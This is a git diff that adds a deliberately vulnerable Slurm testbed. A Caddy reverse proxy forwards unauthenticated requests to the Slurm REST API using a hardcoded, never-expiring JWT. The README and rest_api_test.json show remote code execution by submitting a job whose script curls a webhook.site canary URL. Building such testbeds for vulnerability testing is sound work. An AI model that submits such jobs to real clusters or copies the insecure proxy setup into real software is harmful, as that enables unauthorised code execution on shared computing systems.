diff --git a/slurm/exposed_rest_api/README.md b/slurm/exposed_rest_api/README.md
new file mode 100644
index 00000000..58c1b29a
--- /dev/null
+++ b/slurm/exposed_rest_api/README.md
@@ -0,0 +1,95 @@
+# Slurm Testbed
+
+## Overview
+The Slurm REST API requires authentication by default. However, a common configuration places a reverse proxy in front of the API: the proxy (in theory) authenticates the user by some other means and, on success, authenticates to the Slurm REST API with a hardcoded JWT token injected into the forwarded request's headers.
+
+This configuration is described in the official documentation [here](https://slurm.schedmd.com/rest.html#auth_proxy), with an implementation example [here](https://gitlab.com/SchedMD/training/docker-scale-out/-/tree/production/proxy).
+
+If the reverse proxy is misconfigured to simply forward requests without performing any authentication step, it allows anyone to use the API and gain RCE by submitting malicious jobs to the cluster.
+
+## This testbed
+
+To simulate an insecure REST API proxy, a Caddy server is deployed in reverse-proxy mode on `127.0.0.1:8080`. The proxy authenticates to the Slurm REST API with a pre-generated JWT token that never expires, so there is no need to generate a new token every time the testbed is launched.
+
+The secure Slurm REST API is also exposed on `127.0.0.1:6820` for testing purposes.
+
+## Testbed Setup
+
+To start the testbed, simply run `docker compose up`.
+
+## Test the vulnerability
+You can test the vulnerability by setting the `script` field in the `rest_api_test.json` file to the command you want to execute. For example, you can get a canary URL from a service like [webhook.site](https://webhook.site) and run a curl command to receive a callback. Here's an example:
+```json
+{
+    "job": {
+        "name": "test",
+        "ntasks": 1,
+        "current_working_directory": "/tmp",
+        "environment": [
+            "PATH:/bin:/usr/bin/:/usr/local/bin/"
+        ]
+    },
+    "script": "#!/bin/bash\ncurl https://webhook.site/11b9a510-d69d-4f51-9f93-5d236c72e6c1"
+}
+```
+Note: make sure to keep the shebang (`#!/bin/bash\n`) at the start of the string.
+
+Then you can submit the job using curl:
+```sh
+curl http://127.0.0.1:8080/slurm/v0.0.39/job/submit -H "Content-Type: application/json" -d @rest_api_test.json
+```
+
+A response from a vulnerable API will look like this:
+```json
+{
+    "meta": {
+        "plugin": {
+            "type": "openapi\/v0.0.39",
+            "name": "Slurm OpenAPI v0.0.39",
+            "data_parser": "v0.0.39"
+        },
+        "client": {
+            "source": "[api-proxy.slurm-testbed_slurm-testbed-network]:10988"
+        },
+        "Slurm": {
+            "version": {
+                "major": 24,
+                "micro": 4,
+                "minor": 5
+            },
+            "release": "24.05.4"
+        }
+    },
+    "errors": [],
+    "warnings": [],
+    "result": {
+        "job_id": 11,
+        "step_id": "batch",
+        "error_code": 0,
+        "error": "No error",
+        "job_submit_user_msg": ""
+    },
+    "job_id": 11,
+    "step_id": "batch",
+    "job_submit_user_msg": ""
+}
+```
+
+To check against a non-vulnerable API, send the same request to the original REST API on port 6820, which requires authentication by default and is therefore not vulnerable:
+```sh
+curl http://127.0.0.1:6820/slurm/v0.0.39/job/submit -H "Content-Type: application/json" -d @rest_api_test.json
+
+Authentication failure
+```
+
+As you can see, authentication fails and the request is rejected.
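+
+## Regenerating the proxy token
+The `X-SLURM-USER-TOKEN` value hardcoded in `docker-compose.yml` is an HS256 JWT signed with the static key in `slurm/jwt_hs256.key` and carries a far-future `exp` claim. If you change the key and need a fresh token, one option is to let Slurm mint it inside the running container. This is a sketch that assumes the service and user names used by this testbed:
+```sh
+# Ask slurmctld for a long-lived token signed with the loaded jwt_hs256.key;
+# lifespan is expressed in seconds (roughly ten years here).
+docker compose exec slurm scontrol token username=slurm lifespan=315360000
+# prints a line like: SLURM_JWT=eyJhbGciOiJIUzI1NiIs...
+```
+Paste the token into the `X-SLURM-USER-TOKEN` header in `docker-compose.yml` and restart the testbed.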
diff --git a/slurm/exposed_rest_api/docker-compose.yml b/slurm/exposed_rest_api/docker-compose.yml
new file mode 100644
index 00000000..94a40d52
--- /dev/null
+++ b/slurm/exposed_rest_api/docker-compose.yml
@@ -0,0 +1,35 @@
+name: slurm-testbed
+services:
+  slurm:
+    build: ./slurm
+    ports:
+      - 6820:6820
+    networks:
+      - slurm-testbed-network
+
+  api-proxy:
+    image: caddy:2.9-alpine
+    container_name: api-proxy
+    command:
+      - "caddy"
+      - "reverse-proxy"
+      - "--from"
+      - ":8080"
+      - "--to"
+      - "http://slurm:6820"
+      - "--header-up"
+      - "X-SLURM-USER-NAME: slurm"
+      - "--header-up"
+      # Never-expiring HS256 JWT signed with slurm/jwt_hs256.key (see README)
+      - "X-SLURM-USER-TOKEN: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjM4Nzk4MDQ5MjQsImlhdCI6MTczMjMyMTI3OCwic3VuIjoicm9vdCJ9.lV0sZg_KGxSck90yxVJ52vWzeL_ldtqse_Fn10vWz_0"
+      - "--access-log"
+    ports:
+      - 8080:8080
+    depends_on:
+      - "slurm"
+    networks:
+      - slurm-testbed-network
+
+networks:
+  slurm-testbed-network:
+    driver: bridge
diff --git a/slurm/exposed_rest_api/rest_api_test.json b/slurm/exposed_rest_api/rest_api_test.json
new file mode 100644
index 00000000..18631c60
--- /dev/null
+++ b/slurm/exposed_rest_api/rest_api_test.json
@@ -0,0 +1,11 @@
+{
+    "job": {
+        "name": "test",
+        "ntasks": 1,
+        "current_working_directory": "/tmp",
+        "environment": [
+            "PATH:/bin:/usr/bin/:/usr/local/bin/"
+        ]
+    },
+    "script": "#!/bin/bash\ncurl https://webhook.site/11b9a510-d69d-4f51-9f93-5d236c72e6c1"
+}
diff --git a/slurm/exposed_rest_api/slurm/Dockerfile b/slurm/exposed_rest_api/slurm/Dockerfile
new file mode 100644
index 00000000..2cc35dcb
--- /dev/null
+++ b/slurm/exposed_rest_api/slurm/Dockerfile
@@ -0,0 +1,50 @@
+# Slurm 24 is not available in bookworm
+FROM debian:trixie-slim
+
+ARG DEBIAN_FRONTEND=noninteractive
+
+RUN set -ex \
+    && apt-get update -y \
+    && apt-get install -y \
+        slurm-wlm \
+        slurmrestd \
+        slurm-wlm-basic-plugins \
+        slurm-wlm-jwt-plugin \
+        munge \
+        curl
+
+RUN mkdir -p /etc/sysconfig/slurm \
+    /var/spool/slurm \
+    /var/run/slurm \
+    /var/lib/slurm \
+    /var/log/slurm \
+    /var/spool/slurm/statesave \
+    /run/munge \
+    /data
+RUN touch /var/lib/slurm/node_state \
+    /var/lib/slurm/front_end_state \
+    /var/lib/slurm/job_state \
+    /var/lib/slurm/resv_state \
+    /var/lib/slurm/trigger_state \
+    /var/lib/slurm/assoc_mgr_state \
+    /var/lib/slurm/assoc_usage \
+    /var/lib/slurm/qos_usage \
+    /var/lib/slurm/fed_mgr_state
+
+# Generate key for JWT authentication
+# RUN dd if=/dev/random of=/var/spool/slurm/statesave/jwt_hs256.key bs=32 count=1
+
+# Let's use a static JWT key for testing
+COPY jwt_hs256.key /var/spool/slurm/statesave/jwt_hs256.key
+
+# Set permissions
+RUN chown -R slurm:slurm /var/*/slurm*
+RUN chown -R munge:munge /run/munge
+RUN chmod 0600 /var/spool/slurm/statesave/jwt_hs256.key \
+    && chmod 0755 /var/spool/slurm/statesave
+
+COPY slurm.conf /etc/slurm/slurm.conf
+COPY cgroup.conf /etc/slurm/cgroup.conf
+
+COPY entrypoint.sh /entrypoint.sh
+ENTRYPOINT ["/entrypoint.sh"]
\ No newline at end of file
diff --git a/slurm/exposed_rest_api/slurm/cgroup.conf b/slurm/exposed_rest_api/slurm/cgroup.conf
new file mode 100644
index 00000000..2ad107f5
--- /dev/null
+++ b/slurm/exposed_rest_api/slurm/cgroup.conf
@@ -0,0 +1,2 @@
+CgroupPlugin=disabled
+IgnoreSystemd=yes
\ No newline at end of file
diff --git a/slurm/exposed_rest_api/slurm/entrypoint.sh b/slurm/exposed_rest_api/slurm/entrypoint.sh
new file mode 100755
index 00000000..2239a974
--- /dev/null
+++ b/slurm/exposed_rest_api/slurm/entrypoint.sh
@@ -0,0 +1,27 @@
+#!/bin/bash
+set -e
+
+# Start munge
+service munge start
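+
+# Give munge a moment to create its socket; the Slurm daemons authenticate
+# via auth/munge (see slurm.conf) and fail to start if it is not ready yet.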
+sleep 1
+
+# Start slurmctld and wait for it to start
+/usr/sbin/slurmctld -i -Dvv &
+sleep 2
+# bash /dev/tcp trick: the redirection only succeeds once slurmctld listens on 6817
+until 2>/dev/null >/dev/tcp/127.0.0.1/6817
+do
+    echo "Waiting for slurmctld to start"
+    sleep 2
+done
+
+# Start slurmd (worker process)
+/usr/sbin/slurmd -Dvv &
+
+# Start slurmrestd
+export SLURM_JWT="daemon"
+export SLURMRESTD_SECURITY="disable_unshare_files,disable_unshare_sysv,disable_user_check"
+/usr/sbin/slurmrestd 0.0.0.0:6820 -a rest_auth/jwt -vv
\ No newline at end of file
diff --git a/slurm/exposed_rest_api/slurm/jwt_hs256.key b/slurm/exposed_rest_api/slurm/jwt_hs256.key
new file mode 100644
index 00000000..bd4d9c9f
--- /dev/null
+++ b/slurm/exposed_rest_api/slurm/jwt_hs256.key
@@ -0,0 +1 @@
+"w/*i- w1Q OM6Fj_͏
\ No newline at end of file
diff --git a/slurm/exposed_rest_api/slurm/slurm.conf b/slurm/exposed_rest_api/slurm/slurm.conf
new file mode 100644
index 00000000..1769d199
--- /dev/null
+++ b/slurm/exposed_rest_api/slurm/slurm.conf
@@ -0,0 +1,55 @@
+# slurm.conf
+#
+# See the slurm.conf man page for more information.
+#
+ClusterName=linux
+ControlMachine=localhost
+ControlAddr=localhost
+SlurmctldPort=6817
+SlurmdPort=6818
+AuthType=auth/munge
+AuthAltTypes=auth/jwt
+AuthAltParameters=jwt_key=/var/spool/slurm/statesave/jwt_hs256.key
+StateSaveLocation=/var/lib/slurm
+SlurmdSpoolDir=/var/spool/slurm
+SwitchType=switch/none
+MpiDefault=none
+SlurmctldPidFile=/var/run/slurm/slurmctld.pid
+SlurmdPidFile=/var/run/slurm/slurmd.pid
+ProctrackType=proctrack/linuxproc
+ReturnToService=0
+#
+# TIMERS
+SlurmctldTimeout=300
+SlurmdTimeout=300
+InactiveLimit=0
+MinJobAge=300
+KillWait=30
+Waittime=0
+#
+# SCHEDULING
+SchedulerType=sched/backfill
+SelectType=select/cons_tres
+SelectTypeParameters=CR_CPU_Memory
+#
+# LOGGING
+SlurmctldDebug=3
+SlurmctldLogFile=/var/log/slurm/slurmctld.log
+SlurmdDebug=3
+SlurmdLogFile=/var/log/slurm/slurmd.log
+JobCompType=jobcomp/filetxt
+JobCompLoc=/var/log/slurm/jobcomp.log
+#
+# ACCOUNTING
+JobAcctGatherType=jobacct_gather/linux
+JobAcctGatherFrequency=30
+#
+# COMPUTE NODES
+NodeName=localhost RealMemory=1000 State=UNKNOWN
+#
+# PARTITIONS
+PartitionName=normal Default=yes Nodes=localhost Priority=50 DefMemPerCPU=500 Shared=NO MaxNodes=2 MaxTime=5-00:00:00 DefaultTime=5-00:00:00 State=UP
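+#
+# NOTE: jwt_key above must point at the same file the Dockerfile copies into
+# the image (/var/spool/slurm/statesave/jwt_hs256.key); slurmrestd validates
+# the proxy's hardcoded token against this key.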